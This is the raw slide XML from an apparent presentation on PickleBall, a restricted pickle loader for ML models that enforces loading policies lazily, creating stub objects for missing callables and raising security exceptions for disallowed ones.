              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1285">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992928"/>
            <a:ext cx="630600" cy="606300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19125">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91625" lIns="91625" spcFirstLastPara="1" rIns="91625" wrap="square" tIns="91625">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1402"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992927"/>
            <a:ext cx="630405" cy="606068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177425" y="3710825"/>
            <a:ext cx="1092000" cy="615000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p99"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320625" y="4018325"/>
            <a:ext cx="1590300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p99"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="2338825"/>
            <a:ext cx="1679100" cy="688800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213671" y="1800712"/>
            <a:ext cx="563087" cy="525483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1246" name="Google Shape;1246;p99"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546349" y="3141134"/>
            <a:ext cx="688200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221788" y="2252722"/>
            <a:ext cx="1092000" cy="603600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248" name="Google Shape;1248;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="1454725"/>
            <a:ext cx="1426500" cy="434700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516368" y="2980667"/>
            <a:ext cx="502800" cy="407400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1323">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="1323">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164559" y="3460128"/>
            <a:ext cx="1206300" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Google Shape;1251;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="5531050"/>
            <a:ext cx="3911100" cy="2955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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>drop-in replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> for the pickle module. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Raises security exceptions when opcodes import or invoke disallowed callables.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall loads policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for missing but unimportant callables. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>When a missing callable is imported, PickleBall creates a stub object and defers raising a security exception until the stub object is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>some attributes are added to the model as metadata after instantiation. If these are not used during deserialization or inference, they do not need to be instantiated.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Google Shape;1252;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="838675"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforcement module is a modified Pickle Machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="1513850"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforces policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>missing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>unimportant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> callables</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="2615475"/>
            <a:ext cx="20055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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import GradDescent</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1255" name="Google Shape;1255;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312775" y="2252725"/>
            <a:ext cx="20055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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Stub(“GradDescent”)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

